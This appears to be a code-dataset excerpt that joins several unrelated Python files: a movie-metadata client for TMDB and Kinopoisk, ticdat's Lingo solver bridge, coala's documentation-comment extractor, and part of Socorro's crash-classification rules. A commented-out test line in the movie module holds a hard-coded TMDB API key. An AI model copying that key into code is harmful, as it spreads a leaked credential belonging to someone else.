url = 'http://%s/3/movie/top_rated?api_key=' % TMDB_API.tmdb_api_key['host'] + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&page={}'.format(page)
return TMDB_API.tmdb_query(url)
@staticmethod
def top_rated_tv(page=1):
url = 'http://%s/3/tv/top_rated?api_key=' % TMDB_API.tmdb_api_key['host'] + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&page={}'.format(page)
return TMDB_API.tmdb_query(url, 'tv')
@staticmethod
def show_similar_t(page, tmdb_id, type):
url = 'http://%s/3/' % TMDB_API.tmdb_api_key['host'] + type + '/' + str(
tmdb_id) + '/similar?api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&page={}'.format(page)
log.debug(url)
return TMDB_API.tmdb_query(url, type)
@staticmethod
def show_similar(tmdb_id):
return TMDB_API.show_similar_t(1, tmdb_id, 'movie') + TMDB_API.show_similar_t(1, tmdb_id, 'tv')
@staticmethod
def imdb_by_tmdb_search(orig, year):
try:
for res in TMDB_API.search(orig):
r = res.json_data_
release_date = r.get('release_date')
if year and release_date and year not in release_date:
continue
r_title = r.get('title')
r_original_title = r.get('original_title')
if orig and ( orig == r_title or orig == r_original_title):
return r['imdb_id']
except BaseException as e:
from log import print_tb
print_tb(e)
return None
def __init__(self, imdb_id = None):
if imdb_id:
url_ = TMDB_API.url_imdb_id(imdb_id)
try:
if url_:
self.tmdb_data = json.load(urllib2.urlopen( url_ ))
debug('tmdb_data (' + url_ + ') \t\t\t[Ok]')
else:
self.tmdb_data = None
except:
self.tmdb_data = None
def title(self):
try:
if 'title' in self.tmdb_data:
return self.tmdb_data['title']
if 'name' in self.tmdb_data:
return self.tmdb_data['name']
except:
pass
raise AttributeError
def originaltitle(self):
try:
if 'original_title' in self.tmdb_data:
return self.tmdb_data['original_title']
if 'original_name' in self.tmdb_data:
return self.tmdb_data['original_name']
except:
pass
raise AttributeError
def year(self):
try:
return self.tmdb_data['release_date'].split('-')[0]
except:
raise AttributeError
def poster(self):
return u'http://image.tmdb.org/t/p/original' + self.tmdb_data[u'poster_path']
def fanart(self):
return u'http://image.tmdb.org/t/p/original' + self.tmdb_data[u'backdrop_path']
def set(self):
try:
if u'belongs_to_collection' in self.tmdb_data:
belongs_to_collection = self.tmdb_data[u'belongs_to_collection']
if belongs_to_collection and u'name' in belongs_to_collection:
return belongs_to_collection[u'name']
except:
pass
raise AttributeError
def runtime(self):
return self.tmdb_data['runtime']
def tag(self):
return self.tmdb_data[u'tagline']
def plot(self):
return self.tmdb_data['overview']
def actors(self):
try:
cast = self.tmdb_data['credits']['cast']
except AttributeError:
return []
result = []
for actor in cast:
res = {}
res['en_name'] = actor['name']
if actor.get('profile_path'):
res['photo'] = 'http://image.tmdb.org/t/p/original' + actor['profile_path']
if actor.get('character'):
res['role'] = actor['character']
if actor.get('order'):
res['order'] = actor['order']
result.append(res)
return result
def genres(self):
ll = [g['name'] for g in self.tmdb_data['genres']]
return ll
def countries(self):
from countries import ru
cc = [c['iso_3166_1'] for c in self.tmdb_data['production_countries']]
return [ru(c) for c in cc]
def studios(self):
ss = [ s['name'] for s in self.tmdb_data['production_companies']]
return ss
class MovieAPI(object):
APIs = {}
@staticmethod
def get_by(imdb_id = None, kinopoisk_url = None, orig=None, year=None, imdbRaiting=None, settings = None):
if not imdb_id:
imdb_id = IDs.get_by_kp(kinopoisk_url) if kinopoisk_url else None
if not imdb_id:
try:
_orig = orig
_year = year
if kinopoisk_url:
kp = KinopoiskAPI(kinopoisk_url, settings)
orig = kp.originaltitle()
if not orig:
orig = kp.title()
year = kp.year()
imdb_id = TMDB_API.imdb_by_tmdb_search(orig if orig else _orig, year if year else _year)
except BaseException as e:
from log import print_tb
print_tb(e)
if imdb_id and kinopoisk_url:
IDs.set( imdb_id, kinopoisk_url)
if imdb_id and imdb_id in MovieAPI.APIs:
return MovieAPI.APIs[imdb_id], imdb_id
elif kinopoisk_url and kinopoisk_url in MovieAPI.APIs:
return MovieAPI.APIs[kinopoisk_url], imdb_id
api = MovieAPI(imdb_id, kinopoisk_url, settings, orig, year)
if imdb_id:
MovieAPI.APIs[imdb_id] = api
elif kinopoisk_url:
MovieAPI.APIs[kinopoisk_url] = api
return api, imdb_id
def __init__(self, imdb_id = None, kinopoisk = None, settings = None, orig = None, year=None):
self.providers = []
self.tmdbapi = None
self.imdbapi = None
self.kinopoiskapi = None
self.worldartapi = None
self._actors = None
if imdb_id:
self.tmdbapi = TMDB_API(imdb_id)
self.imdbapi = ImdbAPI(imdb_id)
self.providers = [self.tmdbapi, self.imdbapi]
if not self.tmdbapi.tmdb_data:
self.providers.remove(self.tmdbapi)
if kinopoisk:
if not settings or settings.use_kinopoisk:
self.kinopoiskapi = KinopoiskAPI(kinopoisk, settings)
self.providers.append(self.kinopoiskapi)
if imdb_id or kinopoisk:
if not settings or settings.use_worldart:
if not orig:
for api in self.providers:
try:
orig = api.originaltitle()
break
except:
pass
try:
self.worldartapi = world_art(orig, imdbid=imdb_id, kp_url=kinopoisk)
self.providers.append(self.worldartapi)
except:
pass
def actors(self):
if self._actors is not None:
return self._actors
actors = []
for api in [ self.kinopoiskapi, self.tmdbapi, self.worldartapi ]:
if api:
a = api.actors()
if a:
actors.append(a)
if len(actors) > 0:
self._actors = [ actor.copy() for actor in actors[0] ]
else:
self._actors = []
for act in self._actors:
for variant in actors[1:]:
for add in variant:
try:
if act['en_name'] == add['en_name']:
act.update(add)
except KeyError:
pass
return self._actors
def __getitem__(self, key):
for api in self.providers:
try:
res = api.__getattribute__(key)
if res:
return res()
except BaseException as e:
continue
raise AttributeError
def get(self, key, default=None):
try:
return self.__getitem__(key)
except AttributeError:
return default
def __getattr__(self, name):
if name.startswith('_') or name in self.__dict__:
return object.__getattribute__(self, name)
for api in self.providers:
try:
res = api.__getattribute__(name)
if res:
return res
except AttributeError:
continue
raise AttributeError
def ru(self, name):
def ru_text(text):
if not text:
return False
r = 0
nr = 0
for ch in text:
if ch >= u'А' and ch <= u'Я':
r += 1
elif ch >= u'а' and ch <= u'я':
r += 1
else:
nr += 1
return r > nr
def ru_list(ll):
for l in ll:
if ru_text(l):
return True
return False
for api in self.providers:
try:
res = api.__getattribute__(name)
if res and callable(res):
value = res()
if isinstance(value, list):
if ru_list(value):
return value
else:
if ru_text(value):
return value
except AttributeError:
continue
raise AttributeError
if __name__ == '__main__':
#for res in MovieAPI.search(u'Обитаемый остров'):
# print res.get_info()
#for res in MovieAPI.popular_tv():
# print res.get_info()
#MovieAPI.tmdb_query(
# 'http://api.themoviedb.org/3/movie/tt4589186?api_key=f7f51775877e0bb6703520952b3c7840&language=ru')
#api = MovieAPI(kinopoisk = 'https://www.kinopoisk.ru/film/894027/')
#api = MovieAPI(kinopoisk = 'https://www.kinopoisk.ru/film/257774/')
#api = world_art(title=u"Команда Тора")
from settings import Settings
settings = Settings('.')
settings.kp_usezaborona = True
api = KinopoiskAPI('https://www.kinopoisk.ru/film/257774/', settings)
title = api.title()
api = world_art(u'The Fate of the Furious', year='2017', kp_url='https://www.kinopoisk.ru/film/894027/')
info = api.info
knowns = info.knowns
plot = info.plot
actors = [act for act in info.actors]
pass
| gpl-3.0 | -896,833,385,007,039,600 | 24.823933 | 174 | 0.631475 | false |
opalytics/opalytics-ticdat | ticdat/lingo.py | 1 | 14369 | from ticdat.utils import verify, containerish, stringish, find_duplicates_from_dict_ticdat
from ticdat.utils import find_case_space_duplicates
import ticdat.utils as tu
from ticdat.ticdatfactory import TicDatFactory
import os, subprocess, inspect, time, uuid, shutil
from collections import defaultdict
from ticdat.jsontd import make_json_dict
INFINITY = 999999
def _code_dir():
return os.path.dirname(os.path.abspath(inspect.getsourcefile(_code_dir)))
def lingo_run(lng_file, input_tdf, input_dat, soln_tdf, infinity=INFINITY, runlingo_path=None):
"""
solve an optimization problem using an Lingo .lng file
:param lng_file: An Lingo .lng file.
:param input_tdf: A TicDatFactory defining the input schema
:param input_dat: A TicDat object consistent with input_tdf
:param soln_tdf: A TicDatFactory defining the solution variables
:param infinity: A number used to represent infinity in Lingo
:param runlingo_path: A path to the runlingo executable
:return: a TicDat object consistent with soln_tdf, or None if no solution found
"""
verify(os.path.isfile(lng_file), "lng_file %s is not a valid file."%lng_file)
verify(not find_case_space_duplicates(input_tdf),
"There are case space duplicate field names in the input schema.")
verify(not find_case_space_duplicates(soln_tdf),
"There are case space duplicate field names in the solution schema.")
verify(len({input_tdf.lingo_prepend + t for t in input_tdf.all_tables}.union(
{soln_tdf.lingo_prepend + t for t in soln_tdf.all_tables})) ==
len(input_tdf.all_tables) + len(soln_tdf.all_tables),
"There are colliding input and solution table names.\nSet lingo_prepend so " +
"as to insure the input and solution table names are effectively distinct.")
msg = []
verify(input_tdf.good_tic_dat_object(input_dat, msg.append),
"tic_dat not a good object for the input_tdf factory : %s"%"\n".join(msg))
mapping = _try_create_space_case_mapping(input_tdf, input_dat)
verify("failures" not in mapping, "The following case-space mapping data collisions were found.\n%s"%
mapping.get("failures"))
input_dat = _apply_space_case_mapping(input_tdf, input_dat, {v:k for k,v in mapping["mapping"].items()})
orig_input_tdf, orig_soln_tdf = input_tdf, soln_tdf
input_dat = input_tdf.TicDat(**make_json_dict(orig_input_tdf, input_dat))
assert input_tdf.good_tic_dat_object(input_dat)
lng_file_name = os.path.basename(lng_file)[:-4]
with open(lng_file, "r") as f:
lng = f.read()
assert ("ticdat_" + lng_file_name + ".lng") in lng
assert ("ticdat_" + lng_file_name + "_output.ldt") in lng
assert ("ticdat_" + lng_file_name + ".ldt") in lng
working_dir = os.path.abspath(os.path.dirname(lng_file))
if tu.development_deployed_environment:
working_dir = os.path.join(working_dir, "lingoticdat_%s"%uuid.uuid4())
shutil.rmtree(working_dir, ignore_errors = True)
os.mkdir(working_dir)
working_dir = os.path.abspath(working_dir)
_ = os.path.join(working_dir, os.path.basename(lng_file))
shutil.copy(lng_file, _)
lng_file = _
commandsfile = os.path.join(working_dir, "ticdat_"+lng_file_name+".ltf")
ldtfile = os.path.join(working_dir, "ticdat_"+lng_file_name+".ldt")
output_txt = os.path.join(working_dir, "output.txt")
soln_tables = {t for t, pk in soln_tdf.primary_key_fields.items() if pk}
results = []
for tbn in soln_tables:
fn = os.path.join(working_dir, tbn+".ldt")
if os.path.isfile(fn):
os.remove(fn)
results.append(fn)
with open(ldtfile, "w") as f:
f.write(create_lingo_text(input_tdf, input_dat, infinity))
verify(os.path.isfile(ldtfile), "Could not create ticdat_" + lng_file_name+".ldt")
with open(os.path.join(working_dir, "ticdat_"+lng_file_name+".lng"), "w") as f:
f.write("! Autogenerated input file, created by lingo.py on " + time.asctime() + " ;\n")
f.write(create_lingo_mod_text(orig_input_tdf))
with open(os.path.join(working_dir,"ticdat_"+lng_file_name+"_output.ldt"), "w") as f:
f.write("! Autogenerated output file, created by lingo.py on " + time.asctime() + " ;\n")
f.write(create_lingo_output_text(orig_soln_tdf))
commands = [
"! Autogenerated commands file, created by lingo.py on " + time.asctime() + " ;",
"TAKE " + lng_file,
"GO",
"QUIT"
]
with open(commandsfile, "w") as f:
f.write("\n".join(commands))
if not runlingo_path:
if 'TICDAT_LINGO_PATH' in os.environ:
runlingo_path = os.environ['TICDAT_LINGO_PATH']
else:
verify_str = "need to either pass runlingo_path argument or run lingo_run_setup.py"
if tu.development_deployed_environment:
verify_str = "Could not find runlingo. Make sure the Application Type is set correctly"
verify(os.path.isfile(os.path.join(_code_dir(),"runlingo_path.txt")), verify_str)
with open(os.path.join(_code_dir(),"runlingo_path.txt"),"r") as f:
runlingo_path = f.read().strip()
verify(os.path.isfile(runlingo_path), "%s not a valid path to runlingo"%runlingo_path)
output = ''
try:
output = subprocess.check_output([runlingo_path, commandsfile], stderr=subprocess.STDOUT, cwd=working_dir)
except subprocess.CalledProcessError as err:
if tu.development_deployed_environment:
raise Exception("runlingo failed to complete: " + str(err.output))
with open(output_txt, "w") as f:
f.write(str(output))
output_data = {}
for i in zip(soln_tables,results):
if not os.path.isfile(i[1]):
print("%s is not a valid file. A solution was likely not generated. Check 'output.txt' for details."%i[1])
return None
with open(i[1], "r") as f:
output_data[i[0]] = f.read()
rtn = read_lingo_text(soln_tdf, output_data)
return _apply_space_case_mapping(soln_tdf, rtn, mapping["mapping"])
_can_run_lingo_run_tests = os.path.isfile(os.path.join(_code_dir(),"runlingo_path.txt")) or "TICDAT_LINGO_PATH" in os.environ
def create_lingo_output_text(tdf):
"""
Generate a Lingo output .ldt string from a TicDat object.
:param tdf: A TicDatFactory defining the output schema
:return: A string consistent with the Lingo .ldt format
"""
prepend = getattr(tdf, "lingo_prepend", "")
dict_tables = {t for t, pk in tdf.primary_key_fields.items() if pk}
rtn = 'data:\n'
for tbn in dict_tables:
p_tbn = prepend + tbn
rtn += '\t@TEXT(\"' + tbn + ".ldt\") = " + p_tbn
for fk in tdf.data_fields[tbn]:
rtn += ", " + p_tbn + "_" + fk.lower().replace(" ","")
rtn += ";\n"
rtn += 'enddata'
return rtn
def create_lingo_text(tdf, tic_dat, infinity=INFINITY):
"""
Generate a Lingo .ldt string from a TicDat object
:param tdf: A TicDatFactory defining the schema
:param tic_dat: A TicDat object consistent with tdf
:param infinity: A number used to represent infinity in lingo
:return: A string consistent with the Lingo .ldt format
"""
msg = []
verify(tdf.good_tic_dat_object(tic_dat, msg.append),
"tic_dat not a good object for this factory : %s"%"\n".join(msg))
verify(not tdf.generator_tables, "doesn't work with generator tables.")
verify(not tdf.generic_tables, "doesn't work with generic tables. (not yet - will add ASAP as needed) ")
dict_with_lists = defaultdict(list)
dict_tables = {t for t,pk in tdf.primary_key_fields.items() if pk}
prepend = getattr(tdf, "lingo_prepend", "")
for t in dict_tables:
for k,r in getattr(tic_dat, t).items():
row = list(k) if containerish(k) else [k]
for f in tdf.data_fields.get(t, []):
row.append(r[f])
dict_with_lists[t].append(row)
for t in set(tdf.all_tables).difference(dict_tables):
for r in getattr(tic_dat, t):
row = [r[f] for f in tdf.data_fields[t]]
dict_with_lists[t].append(row)
rtn = "data:\n"
for t in _sorted_tables(tdf):
rtn += "%s"%(prepend + t)
for field in tdf.data_fields[t]:
rtn += ',' + prepend + t + "_" + field.replace(" ", "_").lower()
rtn += "=\n"
for row in dict_with_lists[t]:
rtn += "\t"
for field in row:
if stringish(field):
rtn += field + " "
else:
rtn += str(infinity) if float('inf') == field else str(field) + " "
rtn += "\n"
rtn += ";\n"
rtn+="enddata"
return rtn
def create_lingo_mod_text(tdf):
"""
Generate a Lingo .lng string from a TicDat object for diagnostic purposes
:param tdf: A TicDatFactory defining the input schema
:return: A string consistent with the Lingo .lng input format
"""
verify(not find_case_space_duplicates(tdf), "There are case space duplicate field names in the schema.")
verify(not tdf.generator_tables, "Input schema error - doesn't work with generator tables.")
verify(not tdf.generic_tables, "Input schema error - doesn't work with generic tables. (not yet - will \
add ASAP as needed) ")
rtn = 'sets:\n'
dict_tables = {t for t, pk in tdf.primary_key_fields.items() if pk}
verify(set(dict_tables) == set(tdf.all_tables), "not yet handling non-PK tables of any sort")
prepend = getattr(tdf, "lingo_prepend", "")
def get_table_as_mod_text(tdf, tbn):
p_tbn = prepend + tbn
rtn = p_tbn
if len(tdf.primary_key_fields[tbn]) > 1:
fkr = []
for i in range(len(tdf.primary_key_fields[tbn])):
pk = tdf.primary_key_fields[tbn][i]
fk = list(filter(lambda k: k.native_table == tbn and k.mapping.native_field == pk, tdf.foreign_keys))
verify(len(fk) == 1, "Table '%s' needs to fully link it's primary key fields to parent tables via"
" foreign keys."%tbn)
fkr.append(prepend + fk[0].foreign_table)
rtn += '(' + ','.join(fkr) + ')'
rtn += ':'
fields = []
for df in tdf.data_fields[tbn]:
df_m = p_tbn + '_' + df.replace(' ', '_').lower()
fields.append(df_m)
rtn += ','.join(fields)
rtn += ';\n'
return rtn
for t in _sorted_tables(tdf):
rtn += get_table_as_mod_text(tdf, t)
rtn+='endsets'
return rtn
def read_lingo_text(tdf,results_text):
"""
Read Lingo .ldt strings
:param tdf: A TicDatFactory defining the schema
:param results_text: A list of strings defining Lingo tables
:return: A TicDat object consistent with tdf
"""
for i in results_text.values():
verify(stringish(i), "text needs to be a string")
def _get_as_type(val):
try:
return float(val)
except ValueError:
return val
dict_with_lists = defaultdict(list)
for tbn in results_text:
rows = []
text = results_text[tbn].strip().split("\n")
for line in text:
rows.append(list(map(lambda k: _get_as_type(k),line.strip().split())))
dict_with_lists[tbn] = rows
assert not find_duplicates_from_dict_ticdat(tdf, dict_with_lists), \
"duplicates were found - if asserts are disabled, duplicate rows will overwrite"
return tdf.TicDat(**{k.replace(tdf.lingo_prepend,"",1):v for k,v in dict_with_lists.items()})
def _try_create_space_case_mapping(tdf, ticdat):
'''
:param tdf: a TicDatFactory
:param ticdat: a ticdat for the tdf
:return: {"mapping:mapping} if a good mapping can be made, else {"failures":failures}
'''
assert tdf.good_tic_dat_object(ticdat), "ticdat not a good object for the tdf"
rtn = defaultdict(set)
for t in tdf.all_tables:
if tdf.primary_key_fields.get(t):
for ks in getattr(ticdat, t):
for k in (ks if containerish(ks) else [ks]):
if stringish(k):
newk = ''.join(list(map(lambda c: c.upper() if c.isalnum() else '_', k)))
rtn[newk].add(k)
failures = {k:tuple(sorted(v)) for k,v in rtn.items() if len(v) > 1}
if failures:
return {"failures":failures}
return {"mapping": {k:next(iter(v)) for k,v in rtn.items()}}
def _apply_space_case_mapping(tdf, ticdat, mapping):
"""
:param tdf: a TicDatFactory
:param ticdat: a ticdat for the tdf
:param mapping: the mapping returned by an earlier call to _try_create_space_case_mapping.
**Should be the value in the {"mapping":mapping} dict, if such a dict was
returned, and not the {"mapping":mapping} dict itself.
:return:
"""
assert tdf.good_tic_dat_object(ticdat), "ticdat not a good object for the tdf"
assert tu.dictish(mapping)
def apply_mapping(k):
if containerish(k):
return tuple(list(map(apply_mapping, k)))
return mapping.get(k, k)
rtn = tdf.copy_tic_dat(ticdat)
for t in tdf.all_tables:
if tdf.primary_key_fields.get(t):
for k,v in getattr(ticdat, t).items():
del getattr(rtn, t)[k]
getattr(rtn, t)[apply_mapping(k)] = v
return rtn
def _sorted_tables(tdf):
"""
:param tdf: a TicDatFactory
:return: A list of tables that is sorted so primary keys are defined before other tables where they are used
"""
ordered_tables = []
dict_tables = {t for t, pk in tdf.primary_key_fields.items() if pk}
def next_table(tbn):
fks = list(filter(lambda k: k.native_table == tbn, tdf.foreign_keys))
if len(fks) == 0:
return [tbn]
tables = []
for fk in fks:
if fk.foreign_table not in tables + ordered_tables:
tables += next_table(fk.foreign_table)
return tables + [tbn]
for tbn in dict_tables:
for table in next_table(tbn):
if table not in ordered_tables:
ordered_tables.append(table)
return ordered_tables | bsd-2-clause | -1,763,562,608,612,621,800 | 41.895522 | 125 | 0.608393 | false |
stevemontana1980/coala | coalib/bearlib/languages/documentation/DocumentationExtraction.py | 2 | 11010 | import re
from coalib.bearlib.languages.documentation.DocstyleDefinition import (
DocstyleDefinition)
from coalib.bearlib.languages.documentation.DocumentationComment import (
DocumentationComment)
from coalib.results.TextRange import TextRange
def _extract_doc_comment_simple(content, line, column, markers):
"""
Extract a documentation that starts at given beginning with simple layout.
The property of the simple layout is that there's no each-line marker. This
applies e.g. for python docstrings.
:param content: Presplitted lines of the source-code-string.
:param line: Line where the documentation comment starts (behind the
start marker). Zero-based.
:param column: Column where the documentation comment starts (behind the
start marker). Zero-based.
:param markers: The documentation identifying markers.
:return: If the comment matched layout a triple with end-of-comment
line, column and the extracted documentation. If not
matched, returns None.
"""
align_column = column - len(markers[0])
pos = content[line].find(markers[2], column)
if pos != -1:
return line, pos + len(markers[2]), content[line][column:pos]
doc_comment = content[line][column:]
line += 1
while line < len(content):
pos = content[line].find(markers[2])
if pos == -1:
doc_comment += ("\n" if content[line][align_column:] == ""
else content[line][align_column:])
else:
doc_comment += content[line][align_column:pos]
return line, pos + len(markers[2]), doc_comment
line += 1
return None
def _extract_doc_comment_continuous(content, line, column, markers):
"""
Extract a documentation that starts at given beginning with continuous
layout.
The property of the continuous layout is that the each-line-marker and the
end-marker do equal. Documentation is extracted until no further marker is
found. Applies e.g. for doxygen style python documentation:
```
## main
#
# detailed
```
:param content: Presplitted lines of the source-code-string.
:param line: Line where the documentation comment starts (behind the
start marker). Zero-based.
:param column: Column where the documentation comment starts (behind the
start marker). Zero-based.
:param markers: The documentation identifying markers.
:return: If the comment matched layout a triple with end-of-comment
line, column and the extracted documentation. If not
matched, returns None.
"""
marker_len = len(markers[1])
doc_comment = content[line][column:]
line += 1
while line < len(content):
pos = content[line].find(markers[1])
if pos == -1:
return line, 0, doc_comment
else:
doc_comment += content[line][pos + marker_len:]
line += 1
if content[line - 1][-1] == "\n":
column = 0
else:
# This case can appear on end-of-document without a ``\n``.
line -= 1
column = len(content[line])
return line, column, doc_comment
def _extract_doc_comment_standard(content, line, column, markers):
"""
Extract a documentation that starts at given beginning with standard
layout.
The standard layout applies e.g. for C doxygen-style documentation:
```
/**
* documentation
*/
```
:param content: Presplitted lines of the source-code-string.
:param line: Line where the documentation comment starts (behind the
start marker). Zero-based.
:param column: Column where the documentation comment starts (behind the
start marker). Zero-based.
:param markers: The documentation identifying markers.
:return: If the comment matched layout a triple with end-of-comment
line, column and the extracted documentation. If not
matched, returns None.
"""
pos = content[line].find(markers[2], column)
if pos != -1:
return line, pos + len(markers[2]), content[line][column:pos]
doc_comment = content[line][column:]
line += 1
while line < len(content):
pos = content[line].find(markers[2])
each_line_pos = content[line].find(markers[1])
if pos == -1:
if each_line_pos == -1:
# If the first text occurrence is not the each-line marker
# now we violate the doc-comment layout.
return None
doc_comment += content[line][each_line_pos + len(markers[1]):]
else:
# If no each-line marker found or it's located past the end marker:
# extract no further and end the doc-comment.
if each_line_pos != -1 and each_line_pos + 1 < pos:
doc_comment += content[line][each_line_pos +
len(markers[1]):pos]
return line, pos + len(markers[2]), doc_comment
line += 1
return None
def _extract_doc_comment(content, line, column, markers):
"""
Delegates depending on the given markers to the right extraction method.
:param content: Presplitted lines of the source-code-string.
:param line: Line where the documentation comment starts (behind the
start marker). Zero-based.
:param column: Column where the documentation comment starts (behind the
start marker). Zero-based.
:param markers: The documentation identifying markers.
:return: If the comment matched layout a triple with end-of-comment
line, column and the extracted documentation. If not
matched, returns None.
"""
if markers[1] == "":
# Extract and align to start marker.
return _extract_doc_comment_simple(content, line, column, markers)
elif markers[1] == markers[2]:
# Search for the each-line marker until it runs out.
return _extract_doc_comment_continuous(content, line, column, markers)
else:
return _extract_doc_comment_standard(content, line, column, markers)
def _compile_multi_match_regex(strings):
"""
Compiles a regex object that matches each of the given strings.
:param strings: The strings to match.
:return: A regex object.
"""
return re.compile("|".join(re.escape(s) for s in strings))
def _extract_doc_comment_from_line(content, line, column, regex,
marker_dict, docstyle_definition):
cur_line = content[line]
begin_match = regex.search(cur_line, column)
if begin_match:
indent = cur_line[:begin_match.start()]
column = begin_match.end()
for marker in marker_dict[begin_match.group()]:
doc_comment = _extract_doc_comment(content, line, column, marker)
if doc_comment is not None:
end_line, end_column, documentation = doc_comment
rng = TextRange.from_values(line + 1,
begin_match.start() + 1,
end_line + 1,
end_column + 1)
doc = DocumentationComment(documentation, docstyle_definition,
indent, marker, rng)
return end_line, end_column, doc
return line + 1, 0, None
def extract_documentation_with_markers(content, docstyle_definition):
"""
Extracts all documentation texts inside the given source-code-string.
:param content: The source-code-string where to extract documentation from.
Needs to be a list or tuple where each string item is a
single line (including ending whitespaces like ``\\n``).
:param markers: The list/tuple of marker-sets that identify a
documentation-comment. Low-index markers have higher
priority than high-index markers.
:return: An iterator returning each DocumentationComment found in
the content.
"""
# Prepare marker-tuple dict that maps a begin pattern to the corresponding
# marker_set(s). This makes it faster to retrieve a marker-set from a
# begin sequence we initially want to search for in source code. Then
# the possible found documentation match is processed further with the
# rest markers.
markers = docstyle_definition.markers
marker_dict = {}
for marker_set in markers:
if marker_set[0] not in marker_dict:
marker_dict[marker_set[0]] = [marker_set]
else:
marker_dict[marker_set[0]].append(marker_set)
# Using regexes to perform a variable match is faster than finding each
# substring with ``str.find()`` choosing the lowest match.
begin_regex = _compile_multi_match_regex(
marker_set[0] for marker_set in markers)
line = 0
column = 0
while line < len(content):
line, column, doc = _extract_doc_comment_from_line(
content,
line,
column,
begin_regex,
marker_dict,
docstyle_definition)
if doc:
yield doc
def extract_documentation(content, language, docstyle):
"""
Extracts all documentation texts inside the given source-code-string using
the coala docstyle definition files.
The documentation texts are sorted by their order appearing in ``content``.
For more information about how documentation comments are identified and
extracted, see DocstyleDefinition.doctypes enumeration.
:param content: The source-code-string where to extract
documentation from. Needs to be a list or tuple
where each string item is a single line
(including ending whitespaces like ``\\n``).
:param language: The programming language used.
:param docstyle: The documentation style/tool used
(e.g. doxygen).
:raises FileNotFoundError: Raised when the docstyle definition file was not
found.
:raises KeyError: Raised when the given language is not defined in
given docstyle.
:raises ValueError: Raised when a docstyle definition setting has an
invalid format.
:return: An iterator returning each DocumentationComment
found in the content.
"""
docstyle_definition = DocstyleDefinition.load(language, docstyle)
return extract_documentation_with_markers(content, docstyle_definition)
| agpl-3.0 | 6,445,702,230,881,130,000 | 37.904594 | 79 | 0.607902 | false |
bsmedberg/socorro | socorro/processor/support_classifiers.py | 1 | 14965 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
This module creates the classfications.support part of the processed crash. All
the support classifcation rules live here.
{...
'classifications': {
'support': {
'classification': 'some classification',
'classification_data': 'extra information saved by rule',
'classification_version': '0.0',
}
}
...
}
"""
from socorro.lib.ver_tools import normalize
from socorro.lib.util import DotDict
from sys import maxint
#==============================================================================
class SupportClassificationRule(object):
"""the base class for Support Rules. It provides the framework for the
rules 'predicate', 'action', and 'version' as well as utilites to help
rules do their jobs."""
#--------------------------------------------------------------------------
def predicate(self, raw_crash, processed_crash, processor):
"""the default predicate for Support Classifiers invokes any derivied
_predicate function, trapping any exceptions raised in the process. We
are obligated to catch these exceptions to give subsequent rules the
opportunity act. An error during the predicate application is a
failure of the rule, not a failure of the classification system itself
"""
try:
return self._predicate(raw_crash, processed_crash, processor)
except Exception, x:
processor.config.logger.debug(
'support_classifier: %s predicate rejection - consideration of'
' %s failed because of "%s"',
self.__class__,
raw_crash.get('uuid', 'unknown uuid'),
x,
exc_info=True
)
return False
#--------------------------------------------------------------------------
def _predicate(self, raw_crash, processed_crash, processor):
""""The default support classifier predicate just returns True. We
want all the support classifiers run.
parameters:
raw_crash - a mapping representing the raw crash data originally
submitted by the client
processed_crash - the ultimate result of the processor, this is the
analized version of a crash. It contains the
output of the MDSW program for each of the dumps
within the crash.
processor - a reference to the processor object that is assigned
to working on the current crash. This object contains
resources that might be useful to a classifier rule.
'processor.config' is the configuration for the
processor in which database connection paramaters can
be found. 'processor.config.logger' is useful for any
logging of debug information.
'processor.c_signature_tool' or
'processor.java_signature_tool' contain utilities that
might be useful during classification.
returns:
True - this rule should be applied
False - this rule should not be applied
"""
return True
#--------------------------------------------------------------------------
def action(self, raw_crash, processed_crash, processor):
"""the default action for Support Classifiers invokes any derivied
_action function, trapping any exceptions raised in the process. We
are obligated to catch these exceptions to give subsequent rules the
opportunity act and perhaps (mitigate the error). An error during the
action application is a failure of the rule, not a failure of the
classification system itself."""
try:
return self._action(raw_crash, processed_crash, processor)
except KeyError, x:
processor.config.logger.debug(
'support_classifier: %s action failure - %s failed because of '
'"%s"',
self.__class__,
raw_crash.get('uuid', 'unknown uuid'),
x,
)
except Exception, x:
processor.config.logger.debug(
'support_classifier: %s action failure - %s failed because of '
'"%s"',
self.__class__,
raw_crash.get('uuid', 'unknown uuid'),
x,
exc_info=True
)
return False
#--------------------------------------------------------------------------
def _action(self, raw_crash, processed_crash, processor):
"""Rules derived from this base class ought to override this method
with an actual classification rule. Successful application of this
method should include a call to '_add_classification'.
parameters:
raw_crash - a mapping representing the raw crash data originally
submitted by the client
processed_crash - the ultimate result of the processor, this is the
analized version of a crash. It contains the
output of the MDSW program for each of the dumps
within the crash.
processor - a reference to the processor object that is assigned
to working on the current crash. This object contains
resources that might be useful to a classifier rule.
'processor.config' is the configuration for the
processor in which database connection paramaters can
be found. 'processor.config.logger' is useful for any
logging of debug information.
'processor.c_signature_tool' or
'processor.java_signature_tool' contain utilities that
might be useful during classification.
returns:
True - this rule was applied successfully and no further rules
should be applied
False - this rule did not succeed and further rules should be
tried
"""
return True
#--------------------------------------------------------------------------
def version(self):
"""This method should be overridden in a base class."""
return '0.0'
#--------------------------------------------------------------------------
def _add_classification(
self,
processed_crash,
classification,
classification_data,
logger=None
):
"""This method adds a 'support' classification to a processed
crash.
parameters:
processed_crash - a reference to the processed crash to which the
classification is to be added.
classification - a string that is the classification.
classification_data - a string of extra data that goes along with a
classification
"""
if 'classifications' not in processed_crash:
processed_crash['classifications'] = DotDict()
processed_crash['classifications']['support'] = DotDict({
'classification': classification,
'classification_data': classification_data,
'classification_version': self.version()
})
if logger:
logger.debug(
'Support classification: %s',
classification
)
return True
#==============================================================================
class BitguardClassifier(SupportClassificationRule):
"""To satisfy Bug 931907, this rule will detect 'bitguard.dll' in the
modules list. If present, it will add the classification,
classifications.support.classification.bitguard to the processed crash"""
#--------------------------------------------------------------------------
def version(self):
return '1.0'
#--------------------------------------------------------------------------
def _action(self, raw_crash, processed_crash, processor):
for a_module in processed_crash['json_dump']['modules']:
if a_module['filename'] == 'bitguard.dll':
self._add_classification(
processed_crash,
'bitguard',
None,
processor.config.logger
)
return True
# bitguard was never found, this rule fails
return False
#==============================================================================
class OutOfDateClassifier(SupportClassificationRule):
"""To satisfy Bug 956879, this rule will detect classify crashes as out
of date if the version is less than the threshold
